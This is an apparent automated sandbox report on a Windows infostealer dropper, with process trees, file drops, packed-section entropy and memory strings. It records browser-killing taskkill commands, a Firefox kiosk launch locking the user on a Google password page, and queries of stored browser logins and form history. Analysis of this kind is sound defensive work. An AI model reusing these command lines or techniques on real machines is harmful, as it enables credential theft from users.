Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083A300 11_2_0083A300
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00844487 11_2_00844487
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0084049B 11_2_0084049B
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00837CA4 11_2_00837CA4
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0085CCD0 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0085C470 11_2_0085C470
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00838590 11_2_00838590
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_008335B0 11_2_008335B0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0084C5F0 11_2_0084C5F0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0085FD10 11_2_0085FD10
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083BEB0 11_2_0083BEB0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_00846EBF 11_2_00846EBF
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 11_2_0083AF10 11_2_0083AF10
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: String function: 0084D300 appears 47 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00B17BAF appears 90 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9995358910891089
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: skotes.exe.3.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: random[1].exe.9.dr Static PE information: Section: ZLIB complexity 0.9995358910891089
Source: 26e226f915.exe.9.dr Static PE information: Section: ZLIB complexity 0.9995358910891089
Source: random[1].exe0.9.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: ef2532c0b1.exe.9.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: Section: letztgfz ZLIB complexity 0.9949451708038733
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: Section: ZLIB complexity 0.9981426685967303
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: Section: wehliqok ZLIB complexity 0.9946593394995394
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2408818591.00000000004A1000.00000040.00000001.01000000.00000009.sdmp, 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000003.2368421842.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3013087261.0000000000041000.00000040.00000001.01000000.00000010.sdmp, ef2532c0b1.exe, 0000000C.00000003.2972676425.00000000052C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@73/30@104/12
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\9GL3FFP2.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT fieldname, value FROM moz_formhistory;s
Source: file.exe, 00000000.00000003.2156705356.0000000005749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156338452.0000000005767000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048188721.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3069889044.0000000005E43000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3154199825.000000000597A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3152191548.0000000005998000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3175476349.0000000005994000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: ST44OD0PMG8MCMYJRN4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ef2532c0b1.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe "C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe "C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe"
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe "C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a09107fa-2b02-4b88-8d3f-d1bbd3ed1ba2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 170f356e110 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4340 -parentBuildID 20230927232528 -prefsHandle 4348 -prefMapHandle 4344 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d7e8a7-213f-46a0-8d10-1ac585e34cc2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 17083a29810 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe "C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe "C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe "C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe "C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe "C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe "C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe "C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe "C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe "C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe "C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe "C:\Users\user\AppData\Local\Temp\1001229001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe "C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe "C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe"
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe "C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2276 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2204 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a09107fa-2b02-4b88-8d3f-d1bbd3ed1ba2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 170f356e110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4340 -parentBuildID 20230927232528 -prefsHandle 4348 -prefMapHandle 4344 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d7e8a7-213f-46a0-8d10-1ac585e34cc2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 17083a29810 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process created: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe "C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe"
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: kernel.appcore.dll Jump to behavior
